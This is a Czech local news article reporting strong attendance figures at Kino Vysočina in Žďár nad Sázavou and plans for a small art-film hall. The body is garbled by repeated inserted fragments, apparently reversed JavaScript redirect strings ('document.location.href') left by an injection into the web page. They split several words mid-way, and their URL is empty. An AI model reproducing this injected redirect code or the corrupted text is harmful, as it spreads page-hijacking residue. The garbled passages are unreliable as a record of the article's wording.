Rainbow page separator

Kino se drží v návštěvnosti vysoko nad republikovým průměrem

Pondělí, 14. října 2019

Kino Vysočina Žďár nad Sázavou

Žďár nad Sázavou / Šestadvacet tisíc diváků v prvním pololetí le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku zavítalo do žďárského Kina Vysočina, což činilo průměrnou návštěvnost 92 diváků na jeden film. Číslo se pohybuje vysoko nad republikovým průměrem.
„Celorepublikový průměr je 33 osob na film. V roce 2018 [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pak v Kině Vysočina bylo 19,5 tisíc diváků s průměrnou návštěvností 78 osob na film, přičemž celorepubliková návštěvnost byla 27 osob na film,“ uvedla ředitelka příspěvkové organizace města Kultura Žďár, která kino provozuje, Marcela Lorencová.
Dalším vylepšením Kina Vysočina by po nedávné výměně plátna a instalaci nového ozvučení měl být malý sál pro promítání takzvaných ar[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových filmů, které vyhledává užší okruh diváků. V biografu by tak mohly souběžně běžet dva filmy při jedněch provozních nákladech. Nutností jsou stavební úpravy. „Vybudování nového malého ar[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového sálu by naše kino posunulo mezi kina vícesálová. Technickému vybavení však v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě předchází stavební úpravy, a tak si na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to novinku budeme muset chvíli počkat,“ doplnila Marcela Lorencová.